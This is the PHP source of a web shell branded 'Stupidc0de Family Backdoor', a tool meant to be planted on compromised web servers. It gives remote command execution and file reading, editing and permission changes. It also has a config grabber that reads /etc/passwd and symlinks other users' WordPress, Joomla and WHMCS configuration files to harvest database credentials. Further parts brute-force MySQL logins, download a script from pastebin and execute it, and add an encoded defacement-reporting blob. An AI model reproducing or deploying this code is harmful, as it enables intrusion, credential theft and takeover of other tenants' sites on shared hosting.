shell backdoor [stupid code]

1. <!DOCTYPE HTML>
2. <html lang="en" class="no-js">
3. <HEAD>
4. <title>-:- Backdoor -:-</title>
5. <link href="http://fonts.googleapis.com/css?family=Fredericka+the+Great" rel="stylesheet" type="text/css">
6. <link href="http://fonts.googleapis.com/css?family=Jolly+Lodger" rel="stylesheet" type="text/css">
7. <link href="http://fonts.googleapis.com/css?family=Homenaje" rel="stylesheet" type="text/css">
8. <link rel="shortcut icon" href="https://lh3.googleusercontent.com/-yKAYJuGA9dc/V1BXHLL2SaI/AAAAAAAAABY/fKEVg9XGZr0D2uiqmp2LCBHe65gSDHMMACCo/s512/icon-sc0.jpg" type="image/x-icon">
9. <meta name='author' content='Stupidc0de Family'>
10. <meta charset="UTF-8">
11. <style type="text/css">
12.         body {
13.             background: #000000;
14.             color: springgreen;
15.             font-family :Homenaje;
16.         }
17.  
18.         #content .first{
19.             background-color: black;
20.         }
21.  
22.         a{
23.             color: white;
24.             text-decoration: none;
25.         }
26.  
27.         input,select,textarea{
28.             border: 1px #000000 solid;
29.             -moz-border-radius: 5px;
30.             -webkit-border-radius:5px;
31.             border-radius:5px;
32.         }
33.  
34.         #menu{
35.             background:#000000;
36.             margin:8px 2px 4px 2px;
37.             font-family:Fredericka the Great;
38.             font-size:14px;
39.             color:silver;
40.         }
41.         #menu a{
42.             padding:3px 6px;
43.             margin:1;
44.             background:#2d2b2b;
45.             text-decoration:none;
46.             letter-spacing:2px;
47.             -moz-border-radius: 10px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;  
48.         }
49.         #menu a:hover{
50.             background:black;
51.             border-bottom:1px solid #ffffff;
52.             border-top:1px solid #ffffff;  
53.         }
54.         .tombolupil{
55.             background:black;
56.             color:white;
57.             margin:0 10px;
58.             font-family:Homenaje;
59.             font-size:16px;
60.             border:2px solid crimson;  
61.         }
62.         .tombolupil:hover{
63.             background:crimson;
64.             color:white;
65.             margin:0 10px;
66.             font-family:Homenaje;
67.             font-size:16px;
68.             border:2px solid crimson;
69.         }
70.         .bordergaya{
71.             background:black;
72.             color:white;
73.             margin:0 10px;
74.             font-family:Homenaje;
75.             font-size:16px;
76.             border:2px solid #2d2b2b;  
77.         }
78.         .bordergaya:hover{
79.             background:#2d2b2b;
80.             color:white;
81.             margin:0 10px;
82.             font-family:Homenaje;
83.             font-size:16px;
84.             border:2px solid crimson;
85.         }
86.  
87.         .justborder{
88.             background:black;
89.             color:white;
90.             margin:0 10px;
91.             font-family:Homenaje;
92.             font-size:16px;
93.             border:2px solid #2d2b2b;  
94.         }
95. </style>
96. </HEAD>
97. <BODY>
98. <center>
99. <?php
100.  
101. /*
102. Stupidc0de 2016 Backdoor
103. By Putra-Attacker & Daryun
104. */
105.  
106. /*
107. Terimakasih Untuk Orang - Orang Yang Sudah Membantu Sehingga Terciptanya Web Shell Ini
108. Jujur Saja kami hanya memanfaatkan function dan tools yang di ambil dari shell yang sudah ada Sebelumnya. Jadi Shell Ini Tidak 100% Hasil Codingan Stupidc0de
109. Untuk AnonGhost, Gantengers Crew, Virusa Worm, S1r_V1ru5, Shor7cut, k2ll3d, IndoXploit, Sinkaroid, Ferupuk, 3xp1r3 Cyber Army & Yang Lainnya Yang Tidak Bisa Saya Sebutkan Satu-Persatu Saya Ucapkan "ThankYou Verry Much" Atas Toolsnya. Saya Ucapkan Sekali Lagi Terimakasih.
110.  
111. Jika Ada Yang Kurang Berkenan dihati silahkan kontak saya di :
112. - Email : puputsc48@gmail.com
113. - https://www.facebook.com/PutraAttackerZ
114. - http://www.stupidc0de.family/
115. */
116.  
117. set_time_limit(0);
118. error_reporting(0);
119. if(get_magic_quotes_gpc()){
120. foreach($_POST as $key=>$value){
121. $_POST[$key] = stripslashes($value);
122. }
123. }
124.  
125. /* info server */
126.  
127. $self=$_SERVER['PHP_SELF'];
128. $srvr_sof=$_SERVER['SERVER_SOFTWARE'];
129. $your_ip=$_SERVER['REMOTE_ADDR'];
130. $srvr_ip=$_SERVER['SERVER_ADDR'];
131. $admin=$_SERVER['SERVER_ADMIN'];
132.  
133.  
134. //////all functions disini tempatnya/////
135. function exe($cmd) {    
136. if(function_exists('system')) {        
137.         @ob_start();       
138.         @system($cmd);     
139.         $buff = @ob_get_contents();        
140.         @ob_end_clean();       
141.         return $buff;  
142.     } elseif(function_exists('exec')) {        
143.         @exec($cmd,$results);      
144.         $buff = "";        
145.         foreach($results as $result) {         
146.             $buff .= $result;      
147.         } return $buff;    
148.     } elseif(function_exists('passthru')) {        
149.         @ob_start();       
150.         @passthru($cmd);       
151.         $buff = @ob_get_contents();        
152.         @ob_end_clean();       
153.         return $buff;  
154.     } elseif(function_exists('shell_exec')) {      
155.         $buff = @shell_exec($cmd);     
156.         return $buff;  
157.     }
158. }
159.  
160. function perms($file){
161.         $perms = fileperms($file);
162.  
163.  
164.         if (($perms & 0xC000) == 0xC000) {
165.         // Socket
166.         $info = 's';
167.         } elseif (($perms & 0xA000) == 0xA000) {
168.         // Symbolic Link
169.         $info = 'l';
170.         } elseif (($perms & 0x8000) == 0x8000) {
171.         // Regular
172.         $info = '-';
173.         } elseif (($perms & 0x6000) == 0x6000) {
174.         // Block special
175.         $info = 'b';
176.         } elseif (($perms & 0x4000) == 0x4000) {
177.         // Directory
178.         $info = 'd';
179.         } elseif (($perms & 0x2000) == 0x2000) {
180.         // Character special
181.         $info = 'c';
182.         } elseif (($perms & 0x1000) == 0x1000) {
183.         // FIFO pipe
184.         $info = 'p';
185.         } else {
186.         // Unknown
187.         $info = 'u';
188.         }
189.  
190.         // Owner
191.         $info .= (($perms & 0x0100) ? 'r' : '-');
192.         $info .= (($perms & 0x0080) ? 'w' : '-');
193.         $info .= (($perms & 0x0040) ?
194.         (($perms & 0x0800) ? 's' : 'x' ) :
195.         (($perms & 0x0800) ? 'S' : '-'));
196.  
197.         // Group
198.         $info .= (($perms & 0x0020) ? 'r' : '-');
199.         $info .= (($perms & 0x0010) ? 'w' : '-');
200.         $info .= (($perms & 0x0008) ?
201.         (($perms & 0x0400) ? 's' : 'x' ) :
202.         (($perms & 0x0400) ? 'S' : '-'));
203.  
204.         // World
205.         $info .= (($perms & 0x0004) ? 'r' : '-');
206.         $info .= (($perms & 0x0002) ? 'w' : '-');
207.         $info .= (($perms & 0x0001) ?
208.         (($perms & 0x0200) ? 't' : 'x' ) :
209.         (($perms & 0x0200) ? 'T' : '-'));
210.  
211.         return $info;
212.         }
213.  
214. function getfile($urlfile, $content) {
215.         $fp = fopen($content, "w");
216.         $ch = curl_init();
217.               curl_setopt($ch, CURLOPT_URL, $urlfile);
218.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
219.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
220.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
221.               curl_setopt($ch, CURLOPT_FILE, $fp);
222.         return curl_exec($ch);
223.               curl_close($ch);
224.         fclose($fp);
225.         ob_flush();
226.         flush();
227.     }
228. //////////////END Functions Biar Rapih////////////////////
229.  
230. ///////////////////ZONE-H////////////////
231. $zoneH="lVRti9s4EP4eyH+YimUdQxrvbqF3JLa5ct1Cub3dkqRf7lKC4kxisbJkJLlJWva/d+SXJu1uaWsIkUbz8swzj4RZrlm/F2eoHJo03mhTQIEu1+tkwd7dzeYLlvZ7/wpjtIExeVqUmDnIJLc2CVbarNFs+YEHoHiBFFTUvnVYrEsntEo/aYXP8zhqt3QQNWnSeGVoe6ud2KCBW8owhliosuoqLNixxIKBO5S+hsO9o10peYa5lnTu0VbO8OevnOPZPRKADtAaN+TmDVZ88oYXV4SuqfxaF1woC2O/jX1abpA/Xdu6g/ThO7F2+Rhe/vFnuZ9AjmKbuzG8uLii7UnVJrOvFHV526K/0KCtVoXwLX7ksvKGGar1MflWN/xGfl5+4dHTj036Pej3LLqlEwUupaAsMLgIyS42MHi2qVTmZ7DEvbDOwoBllZFLoYRjYfh5LZBM81xYmGVGlA4qixay99MbuBErw81hCAddQVFZB9Se41LCRhjaPatBcMgNbpIgd64cRxGvrkZlXo4UuqjgquIyQhX5miMCWZX+MEh/wzmOeMrCyUPdp2/pr7Oll+n/wVYHH8J+7zOdtB+RgzzLYYD7Uuq1b22h2BC6iHZEFAbcwlmzDY/xJ6m6r9TU6aB1PcnUSCz4cDQ114ByT45ZHo5LpIsHrJsb0UYC2aJLguVKcnUffEtjc4FGmS4ibrJcfMSorFZS2BzXyUWQ/tdeMP5VBQ1B3bg73EQlIWzR0qoB+S1rZ8RYAl9lAYPTDmozDYNuMqXL8iH8Tdq4ezdfTq/n76e38+mr29mb6+kQLn8tzJPVOR/97U44P7gjwCdmknGLwBpq2OTxrH5clP6GwFpud7vd6IRf5d+iQ2SF2kpk4W/l9c28eXt983pG6VuWk47u80Y0l4mfwnlOj1RBmkwuz0mkVqvk8sliXuKlwe2y4DUjLMq01P65M0gPQnr3T7ygV0DRU7qIpEgj0ncNEPeY1fDCMHyc9jsZtreWjZgHR3+dHGnZCJIWaWxLrtpnMKhhjGFrEFWQ+jAgLJF3SU+F+KiitPhTPE8UonbbMtdeEl2lH1RZEan3J3Y/g0q68c89H75TbSY1yawm0l+rLw==    ";
232.  
233.  
234. /*STYLE UPIL BRO BIAR KEKINIAN*/
235.  
236. echo '<style>
237. .js .inputfile {
238.    width: 0.1px;
239.    height: 0.1px;
240.    opacity: 0;
241.    overflow: hidden;
242.    position: absolute;
243.    z-index: -1;
244. }
245.  
246. .inputfile + label {
247.    max-width: 80%;
248.    font-size: 1.25rem;
249.    /* 20px */
250.    font-weight: 700;
251.    text-overflow: ellipsis;
252.    white-space: nowrap;
253.    cursor: pointer;
254.    display: inline-block;
255.    overflow: hidden;
256.    padding: 0.625rem 1.25rem;
257.    /* 10px 20px */
258. }
259.  
260. .no-js .inputfile + label {
261.    display: none;
262. }
263.  
264. .inputfile:focus + label,
265. .inputfile.has-focus + label {
266.    outline: 1px dotted #000;
267.    outline: -webkit-focus-ring-color auto 5px;
268. }
269.  
270. .inputfile + label * {
271.    /* pointer-events: none; */
272.    /* in case of FastClick lib use */
273. }
274.  
275. .inputfile + label svg {
276.    width: 1em;
277.    height: 1em;
278.    vertical-align: middle;
279.    fill: currentColor;
280.    margin-top: -0.25em;
281.    /* 4px */
282.    margin-right: 0.25em;
283.    /* 4px */
284. }
285.  
286. /* style 4 */
287.  
288. .inputfile-4 + label {
289.    color: white;
290.     font-family:Homenaje;
291.     font-size:15px;
292. }
293.  
294. .inputfile-4:focus + label,
295. .inputfile-4.has-focus + label,
296. .inputfile-4 + label:hover {
297.    color: crimson;
298. }
299.  
300. .inputfile-4 + label figure {
301.    width: 50px;
302.    height: 50px;
303.    border-radius: 25%;
304.    background-color: crimson;
305.    display: block;
306.    padding: 10px;
307.    margin: 0 auto 10px;
308. }
309.  
310. .inputfile-4:focus + label figure,
311. .inputfile-4.has-focus + label figure,
312. .inputfile-4 + label:hover figure {
313.    background-color: white;
314. }
315.  
316. .inputfile-4 + label svg {
317.    width: 100%;
318.    height: 100%;
319.    fill: black;
320. }
321.  
322. .rapihbanget{
323.     text-align: left;
324.     font-size: 16px;
325.     color: springgreen;
326.     font-family: Homenaje;
327.     margin-left: 38%;
328. }
329. .kecew{
330.     text-align: left;
331.     font-size: 15px;
332.     color: white;
333.     font-family: Homenaje;
334. }
335. </style>
336. <script>(function(e,t,n){var r=e.querySelectorAll("html")[0];r.className=r.className.replace(/(^|\s)no-js(\s|$)/,"$1js$2")})(document,window,0);</script>
337. ';
338.  
339. echo"<br/>
340. <pre style='text-align: center; color: grey; font-weight: bold; font-size: 15px;'>
341. *-~'`^'*u_                                _u*'^`'~-*,
342. p!^       /  jPw                            w9j \        ^!p
343. w^.._      /      '\_                      _/'     \        _.^w
344. *_   /          \_       _    _      _/         \     _*
345. q /           / \q   ( `---` )   p/ \          \   p
346. jj5****._    /    ^\_) o  o (_/^    \    _.****6jj
347. *_ /      '==) ;; (=='      \ _*
348. `/.w***,   /(    )\   ,***w.\'
349. ^      ^c/ )    ( \c^      ^
350. 'V')_)(_('V'</pre>";
351. echo "<center><br><font color='Crimson' size='6px' face='Fredericka the Great'>&hearts; Stupidc0de Family Backdoor &hearts;</font></center>";
352. echo "<center><font color='silver' siz='4px' face='Fredericka the Great'>[+] By Putra-Attacker &amp; Daryun [+]</font></center><br/>";
353.  
354. /** info kernel */
355. echo"
356. <font size='4' color='Teal' face='Jolly Lodger'>
357. <center>".php_uname()."<br>
358. ".$software = getenv("SERVER_SOFTWARE");
359. echo"<p>";
360.  
361.     echo"
362. <font size='3.5' color='white'><p>
363.            Your IP : <font color=Crimson> ".$your_ip."</font> <font color=springgreen>|</font> <font color=\"#fff2f2\" > </font> Server IP : <font color=Crimson>".$srvr_ip."</font> <font color=\"#fff2f2\" ><br>
364.  
365.             </font>
366. </font>
367.            </div>
368.            </td>
369.        </tr>
370.    </tbody>
371. </table></div>
372. </font>";
373.  
374. $disablefunctions = @ini_get("disable_functions");
375. $echo_disablefunctions = (!empty($disablefunctions)) ? "<font color=white>".$disablefunctions."</font>" : "<font color=white>Have Fun! None Functions Disabled  For This Server! ~_^</font>";
376. echo '<br/><font size="4" style="font-family:Jolly Lodger; color:teal;">
377. <tr><td> Disable Functions: '.$echo_disablefunctions.'</font><br/></td></tr>';
378.  
379.  
380. echo '<br/><font size="4" style="font-family:Jolly Lodger;">
381. <tr><td> Your Path Location :';
382.  
383. //////////////////////
384. //CWD MULAI DISINI//
385. ////////////////////
386.  
387.  
388. // review shell stupid code :v langsung sadja cikidot
389.  
390. if(isset($_GET['path'])){
391. $path = $_GET['path'];
392. }else{
393. $path = getcwd();
394. }
395. $path = str_replace('\\','/',$path);
396. $paths = explode('/',$path);
397.  
398. foreach($paths as $id=>$pat){
399. if($pat == '' && $id == 0){
400. $a = true;
401. echo '<a href="?path=/">/</a>';
402. continue;
403. }
404. if($pat == '') continue;
405. echo '<a href="?path=';
406. for($i=0;$i<=$id;$i++){
407. echo "$paths[$i]";
408. if($i != $id) echo "/";
409. }
410. echo '">'.$pat.'</a>/';
411. }
412. echo '</font>';
413.  
414. ?>
415.  
416. <!- menu utama ->
417. <br><center><div id="menu">
418. [<a href="?">Home</a>] <font color=orange>=</font>
419. [<a href="?<?php echo "path=".$path; ?>&amp;x=korong">Upload</a>] <font color=orange>=</font>
420. [<a href="?<?php echo "path=".$path; ?>&amp;x=cmd">Command</a>] <font color=orange>=</font>
421. [<a href="?<?php echo "path=".$path; ?>&amp;x=grabc">Config Grabber</a>] <font color=orange>=</font>
422. [<a href="?<?php echo "path=".$path; ?>&amp;x=vn">Domain Viewer</a>] <font color=orange>=</font>
423. [<a href="?<?php echo "path=".$path; ?>&amp;x=masstool">Mass Tool</a>] <font color=orange>=</font>
424. [<a href="?<?php echo "path=".$path; ?>&amp;x=cpanel">Cpanel Tool</a>]
425. <br><br>
426. [<a href="?<?php echo "path=".$path; ?>&amp;x=bypstuls">Bypass Tools</a>] <font color=orange>=</font>
427. [<a href="?<?php echo "path=".$path; ?>&amp;x=fcrot">File Creator</a>] <font color=orange>=</font>
428. <!--[<a href="?<?php echo "path=".$path; ?>&amp;x=cpanel">Web Killer</a>] <font color=orange>-</font>-->
429. [<a href="?<?php echo "path=".$path; ?>&amp;x=krdp">Create RDP</a>] <font color=orange>=</font>
430. [<a href="?<?php echo "path=".$path; ?>&amp;x=jumping">Jumping</a>] <font color=orange>=</font>
431. [<a href="?<?php echo "path=".$path; ?>&amp;x=dump">Dumper tool</a>] <font color=orange>=</font>
432. [<a href="?<?php echo "path=".$path; ?>&amp;x=tentang">About</a>]
433. </div></center>
434. <audio autoplay> <source src="http://www.soundjay.com/button/beep-24.wav" type="audio/mpeg"></audio>
435.  
436. <?php
437.  
438.         /*
439.         Lihat File
440.         Dimulai Dari Sini
441.         */
442.         if(isset($_GET['filesrc'])){
443.             echo "<br /><tr><td>You Are Looking : ";
444.             echo $_GET['filesrc'];
445.             echo '</tr></td></table>';
446.             echo('<br /><br /><textarea rows="20" cols="80">'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
447.             break;
448.         }
449.  
450.  
451.         /*
452.         permission
453.         Dimulai Dari Sini
454.         */
455.  
456.         elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
457.                 echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
458.                 if($_POST['opt'] == 'chmod'){
459.                 if(isset($_POST['perm'])){
460.                 if(chmod($_POST['path'],$_POST['perm'])){
461.                 echo '<script>alert("Change Permission Sukses!");</script>';
462.                 }else{
463.                 echo '<script>alert("Change Permission Gagal!");</script>';
464.                 }
465.                 }
466.                 echo '<form method="POST">
467.                 Permission : <input name="perm" class="bordergaya" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
468.                 <input type="hidden" name="path" value="'.$_POST['path'].'">
469.                 <input type="hidden" name="opt" value="chmod">
470.                 <input class="bordergaya" type="submit" value="Go" />
471.                 </form>';
472.                 }elseif($_POST['opt'] == 'rename'){
473.                 if(isset($_POST['newname'])){
474.                 if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
475.                 echo '<script>alert("Change Name Sukses!");</script>';
476.                 }else{
477.                 echo '<script>alert("Change Name Gagal!");</script>';
478.                 }
479.                 $_POST['name'] = $_POST['newname'];
480.                 }
481.                 echo '<form method="POST">
482.                 New Name : <input class="bordergaya" name="newname" type="text" size="20" value="'.$_POST['name'].'" />
483.                 <input type="hidden" name="path" value="'.$_POST['path'].'">
484.                 <input type="hidden" name="opt" value="rename">
485.                 <input class="bordergaya" type="submit" value="Go" />
486.                 </form>';
487.                 }elseif($_POST['opt'] == 'edit'){
488.                 if(isset($_POST['src'])){
489.                 $fp = fopen($_POST['path'],'w');
490.                 if(fwrite($fp,$_POST['src'])){
491.                 echo '<script>alert("Edit File Sukses!");</script>';
492.                 }else{
493.                 echo '<script>alert("Edit File Gagal!");</script>';
494.                 }
495.                 fclose($fp);
496.                 }
497.                 echo '<form method="POST">
498.                 <textarea class="bordergaya" cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
499.                 <input type="hidden" name="path" value="'.$_POST['path'].'">
500.                 <input type="hidden" name="opt" value="edit">
501.                 <input class="bordergaya" type="submit" value="Go" />
502.                 </form>';
503.                 }
504.                 echo '</center>';
505.                 break;
506.                 }
507.  
508.  
509.         /*
510.         Config Grabber
511.         Dimulai Dari Sini
512.         */
513.  
514. elseif(isset($_GET['x']) && ($_GET['x'] == 'grabc')){ @ini_set('output_buffering',0);
515.  
516. echo "
517. <form method='POST'>
518. </head>
519. <style>
520. textarea {
521. resize:none;
522. color: #000000 ;
523. background-color:#000000;  
524. font-size:8pt; color:#ffffff;
525. border:1px solid white ;
526. border-left: 4px solid white ;
527. width:543px;
528. height:400px;
529. }
530. input {
531. color: #000000;
532. border:1px dotted white;
533. }
534. </style>";
535. echo "<center>";?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Homenaje" color="springgreen" size="2pt">/etc/passwd content</p><br><form method="POST"><textarea name="passwd" class='bordergaya' rows='15' cols='60'><?php echo file_get_contents('/etc/passwd'); ?></textarea><br><br><input name="config" class='bordergaya' size="100" value="Grab!" type="submit"><br></form></center><br><?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink disabled :( </error>');}@mkdir('Stupidc0de-Conf', 0755);@chdir('Stupidc0de-Conf');
536. $htaccess="
537. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
538. Options Indexes FollowSymLinks
539. ForceType text/plain
540. AddType text/plain .php
541. AddType text/plain .html
542. AddType text/html .shtml
543. AddType txt .php
544. AddHandler server-parsed .php
545. AddHandler txt .php
546. AddHandler txt .html
547. AddHandler txt .shtml
548. Options All
549. Options All";
550. file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];
551. $passwd=explode("\n",$passwd);
552. echo "<br><br><center><font face='Homenaje' color=Crimson size=2pt>Kalem Ndan Lagi Di Proses...</center><br>";
553. foreach($passwd as $pwd){
554. $pawd=explode(":",$pwd);$user =$pawd[0];
555. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');
556. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');
557. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');
558. @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');
559. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');
560. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');
561. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');
562. @symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');
563. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');
564. @symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');
565. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');
566. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');
567. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
568. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
569. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
570. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
571. @symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');
572. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
573. @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
574. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');
575. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
576. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');
577. @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
578. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
579. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
580. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
581. @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
582. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
583. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
584. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
585. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
586. @symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
587. @symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
588. @symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
589. @symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
590. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
591. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
592. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
593. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
594. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}
595. echo '<b><font face="Homenaje" color="springgreen" size="3pt"><b>Selesai Bos Q, Monggo >></b> <a target="_blank" href="Stupidc0de-Conf">Hajar Config</a></font></b>';}
596. break;
597. }
598. /////// Cukup Sampai Disini ya Grabber :( ////////
599.  
600.             /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
601.             ///////////////////////////////////////////////START OF ALL CPANEL TOOLS/////////////////////////////////////////////////////////////////////
602.             /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
603.  
604.             /// start cpanel brute
605.         elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
606.                         {
607.                         ?>
608.                         <form action="?path=<?php echo $path; ?>&amp;x=brute" method="post">
609.             <?php
610.  
611.             @set_time_limit(0);
612.             @error_reporting(0);
613.  
614.  
615.             if($_POST['page']=='find')
616.  
617.             {
618.             if(isset($_POST['usernames']) && isset($_POST['passwords']))
619.             {
620.                 if($_POST['type'] == 'passwd'){
621.                     $e = explode("\n",$_POST['usernames']);
622.                     foreach($e as $value){
623.                     $k = explode(":",$value);
624.                     $username .= $k['0']." ";
625.                     }
626.                 }elseif($_POST['type'] == 'simple'){
627.                     $username = str_replace("\n",' ',$_POST['usernames']);
628.                 }
629.                 $a1 = explode(" ",$username);
630.                 $a2 = explode("\n",$_POST['passwords']);
631.                 $id2 = count($a2);
632.                 $ok = 0;
633.                 foreach($a1 as $user )
634.                 {
635.                     if($user !== '')
636.                     {
637.                     $user=trim($user);
638.                      for($i=0;$i<=$id2;$i++)
639.                      {
640.                         $pass = trim($a2[$i]);
641.                         if(@mysql_connect('localhost',$user,$pass))
642.                         {
643.                             echo "Zoo!! ~ user is (<b><font color=white>$user</font></b>) Password is (<b><font color=white>$pass</font></b>)<br />";
644.                             $ok++;
645.                         }
646.                      }
647.                     }
648.                 }
649.                 echo "<hr><b>You Found <font color=red>$ok</font> By Stupidc0de</b>";
650.                 echo "<center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
651.                 exit;
652.             }
653.             }
654.             if($_POST['pass']=='password'){
655.             @error_reporting(0);
656.             $i = getenv('REMOTE_ADDR');
657.             $d = date('D, M jS, Y H:i',time());
658.             $h = $_SERVER['HTTP_HOST'];
659.             $dir=$_SERVER['PHP_SELF'];
660.             mkdir('config',0755);
661.             $cp = file_get_contents("http://pastebin.com/raw/0YG2dZ98");
662.             $file = fopen("cp.py","w+");
663.             $write = fwrite ($file ,$cp);
664.             fclose($file);
665.             chmod("cp.py",0755);
666.             $url = $_POST['url'];
667.             echo"<center>
668.             <textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
669.             system("python cp.py $url config");
670.             unlink ('cp.py');
671.             echo"</textarea>
672.             </center>";
673.             echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
674.             exit;
675.             }
676.             if($_POST['mendapatkan']=='passwd'){
677.             @set_magic_quotes_runtime(0);
678.             ob_start();
679.             error_reporting(0);
680.             @set_time_limit(0);
681.             @ini_set('max_execution_time',0);
682.             @ini_set('output_buffering',0);
683.             $fn = $_POST['foldername'];
684.             //all function here
685.  
686.             function syml($usern,$pdomain)
687.                 {
688.                     symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
689.                     symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
690.                     symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
691.                     symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
692.                     symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
693.                     symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
694.                     symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
695.                     symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
696.                     symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
697.                     symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
698.                     symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
699.                     symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
700.                     symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
701.                     symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
702.                     symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
703.                     symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
704.                     symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
705.                     symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
706.                     symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
707.                     symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
708.                     symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
709.                     symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
710.                     symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
711.                     symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
712.                     symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
713.                     symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
714.                     symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
